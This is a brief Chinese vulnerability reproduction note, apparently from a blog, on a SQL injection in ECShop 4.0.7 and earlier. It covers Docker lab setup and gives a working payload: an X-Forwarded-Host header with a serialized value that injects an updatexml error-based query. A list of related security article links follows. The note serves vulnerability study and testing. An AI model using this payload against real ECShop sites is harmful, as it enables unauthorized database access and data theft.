ECShop 4.x collection_listSQL注入

漏洞描述

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序

影响版本:ecshop4.0.7 及以下

漏洞环境及利用

docker环境搭建

访问8080端口,数据库主机为mysql,账号密码为root

注册一个账户然后登录

payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

漏洞利用

相关推荐
Geometry Fu29 分钟前
《物联网安全》第10章 网络安全管理
物联网·安全·web安全
郑洁文35 分钟前
基于CNN的异常流量监测系统的设计与实现
人工智能·神经网络·网络安全·cnn
落叶_Jim1 小时前
Chrome提示不安全3步让你的网站变成HTTPS
chrome·安全·https
2301_815645381 小时前
网络与安全
网络·安全
User_芊芊君子1 小时前
【JavaEE】线程入门:线程基础 + 安全机制一次讲透
java·安全·java-ee
Geometry Fu1 小时前
《物联网安全》第9章 无线网络安全
物联网·安全·web安全
一只鹿鹿鹿1 小时前
网络安全和安防建设方案(doc文件)
大数据·运维·网络·物联网·安全
宋浮檀s2 小时前
春秋云境——CVE-2022-25488
网络·安全·web安全
安协技术部门2 小时前
安全光栅的优缺点:漫反射式VS对射式
安全·制造
网安小学生(兼顾数据库版)2 小时前
从37万事故损失到零事故:Swisscom如何用ONEKEY筑牢固件安全防线
安全